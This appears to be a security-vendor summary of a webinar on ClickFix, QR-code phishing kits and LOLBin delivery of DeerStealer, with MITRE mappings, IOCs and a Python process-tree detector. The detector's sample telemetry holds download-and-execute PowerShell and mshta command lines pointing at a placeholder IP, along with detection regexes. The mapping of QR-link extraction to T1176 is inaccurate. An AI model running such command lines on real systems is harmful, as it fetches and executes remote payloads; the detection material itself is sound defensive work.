New Malware Tactics: Cases & Detection Tips for SOCs and MSSPs

A webinar from ANY.RUN detailed evolving malware and phishing techniques—ClickFix, QR-code-enabled PhishKits (e.g., Tycoon2FA), and LOLBin abuse in DeerStealer—demonstrating why interactive sandboxing, automation, and fresh threat intelligence are critical for SOC detection and response. #ClickFix #Tycoon2FA #DeerStealer

Key points

  • ClickFix attacks rely on human interaction (fake CAPTCHAs, clipboard hijacking) to execute PowerShell commands and can deploy payloads like Lumma Stealer, AsyncRAT, and DCRAT.
  • PhishKit campaigns increasingly embed malicious links in QR codes (e.g., Tycoon2FA, Mamba2FA) to evade detection and target mobile users, often using multi-stage verification and AI-generated content.
  • Living Off the Land Binaries (LOLBins) such as PowerShell and mshta.exe are abused to hide malicious activity (example: DeerStealer delivery), complicating detection due to use of trusted system utilities.
  • Interactive sandbox analysis that can simulate human actions (solve CAPTCHAs, follow QR-extracted links) is necessary to detect sophisticated multi-stage attacks automated tools miss.
  • Real-time threat intelligence (TI Lookup, TI Feeds) and automation reduce analyst workload, improve detection (88% visible within 60s), cut MTTR (up to 21 minutes), and lower escalations (Tier 1 to Tier 2 reduced by 30%).
  • Attackers use decoy behavior (downloading benign PDFs) and steganography to obscure malicious payload delivery, increasing false-negative risks for standard detection systems.
  • ANY.RUN’s ecosystem (Interactive Sandbox, TI Lookup, TI Feeds) aggregates sandbox telemetry from ~15,000 SOC teams to provide timely IOCs and contextual analysis for faster, more accurate threat detection.

MITRE Techniques

  • [T1056] Input Capture – Clipboard manipulation used to silently copy PowerShell commands to the user’s clipboard (“…a malicious command is copied to the user’s clipboard without any notification…”).
  • [T1204] User Execution – Social engineering and fake CAPTCHAs force users to manually paste and run commands (“…users are instructed to paste and execute clipboard contents through system dialog boxes…”).
  • [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell is used to execute downloaded commands and payloads (“…run the command…it is a PowerShell script…”).
  • [T1176] Browser Extensions (QR code/URL extraction) – QR codes embedded in PDFs direct victims to malicious pages and the sandbox extracts and follows these links (“…The Sandbox extracts the link from the QR code, follows it to a page with a Cloudflare Turnstile CAPTCHA…”).
  • [T1566] Phishing – Phishkit campaigns and phishing emails with malicious PDF attachments are used to trick users into interacting with embedded QR codes and fake login pages (“…phishing email that has a pdf attachment styled to appear as a legitimate DocuSign document…”).
  • [T1204.002] Malicious File – Shortcut (.lnk) files trigger mshta.exe/PowerShell to download executables (“…a malicious .lnk file that executes mshta.exe through PowerShell to download executable files from remote servers.”).
  • [T1218] System Binary Proxy Execution (LOLBins) – Abuse of system utilities (PowerShell, mshta.exe, cmd.exe) to execute malicious actions while blending with legitimate processes (“…hijacking legitimate Windows system utilities such as PowerShell and mshta.exe to execute malicious activities…”).
  • [T1105] Ingress Tool Transfer – Scripts download final payloads (e.g., DeerStealer) from remote servers as part of the kill chain (“…the script connects to an external server to download the payload…the payload is DeerStealer…”).
  • [T1140] Deobfuscate/Decode Files or Information – Steganography and obfuscation used in ClickFix and phishkit attacks to hide payloads and evade detection (“…ClickFix attacks using steganography payloads…”).
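The technique chain above (clipboard-pasted PowerShell, then mshta.exe pulling remote content) can be expressed as a simple process-tree rule. This is an added detection example, not code from ANY.RUN or the webinar; it assumes process-creation telemetry with parent PIDs and command lines, and that a command pasted into the Run dialog is launched with explorer.exe as its parent. The sample events are constructed.

```python
"""Score process-creation events for ClickFix / LOLBin chains."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed sample telemetry (documentation IP range), not a real incident.
SAMPLE = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -w hidden -c "iex (iwr http://198.51.100.7/s.ps1 -UseBasicParsing)"'),
    ProcEvent(300, 200, r"C:\Windows\System32\mshta.exe", "mshta.exe http://198.51.100.7/a.hta"),
    ProcEvent(400, 100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -File C:\scripts\backup.ps1"),  # benign admin script, should not alert
]

# Download / in-memory execution cmdlets and aliases commonly seen in pasted one-liners.
DOWNLOAD_RE = re.compile(r"(?i)\b(iwr|invoke-webrequest|downloadstring|downloadfile|iex|invoke-expression)\b")
# -w hidden / -WindowStyle Hidden: the user must not see the console window.
HIDDEN_RE = re.compile(r"(?i)-w(indowstyle)?\s+h(idden)?\b")
REMOTE_RE = re.compile(r"(?i)\bhttps?://")
SCRIPT_HOSTS = {"powershell.exe", "cmd.exe", "explorer.exe"}


def image_name(ev: ProcEvent) -> str:
    return ev.image.rsplit("\\", 1)[-1].lower()


def detect(events: list[ProcEvent]) -> list[tuple[int, str]]:
    """Return (pid, reason) for events matching the ClickFix / LOLBin patterns."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pname = image_name(parent) if parent else ""
        name = image_name(e)
        # T1204 + T1059.001: PowerShell spawned from the shell (Run dialog), hidden, downloading.
        if name == "powershell.exe" and pname == "explorer.exe" \
                and HIDDEN_RE.search(e.cmdline) and DOWNLOAD_RE.search(e.cmdline):
            alerts.append((e.pid, "T1204/T1059.001: user-launched hidden PowerShell with download cmdlet"))
        # T1218: mshta.exe given a remote URL by a script host or the shell.
        if name == "mshta.exe" and REMOTE_RE.search(e.cmdline) and pname in SCRIPT_HOSTS:
            alerts.append((e.pid, "T1218: mshta.exe fetching remote content"))
    return alerts
```

Tune the parent allow-list and cmdlet list against your own baseline; the benign backup script in the sample shows why the hidden-window and download conditions are both required.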

Indicators of Compromise

  • [File Names] malware & persistence artifacts – startup directory files created by DCRAT/AsyncRAT and other payloads (example: files placed in startup folder, and other dropped filenames reported by sandbox).
  • [Threat Names] campaign/tool identifiers – ClickFix, Tycoon2FA, Mamba2FA, DeerStealer – used as detection tags and TI Lookup queries (example: threatName:"ClickFix", threatName:"qrcode" and threatName:"phishing").
  • [File Types] malicious attachments/shortcuts – PDF attachments with embedded QR codes and .lnk shortcut files used to launch mshta.exe/PowerShell (example: malicious .pdf with QR code, malicious .lnk file).
  • [URLs/Domains] QR-extracted and payload download links – links obtained from QR codes leading to fake login pages and external servers hosting payloads (example: QR-extracted link to page with Cloudflare Turnstile CAPTCHA, and remote payload download URLs reported in sandbox analyses).
  • [Processes/Binaries] abused system utilities – PowerShell, mshta.exe, cmd.exe observed executing suspicious commands and downloads (example: PowerShell execution of clipboard-pasted script, mshta.exe invoked via .lnk).

Read more: https://any.run/cybersecurity-blog/cybersecurity-blog/new-malware-tactics/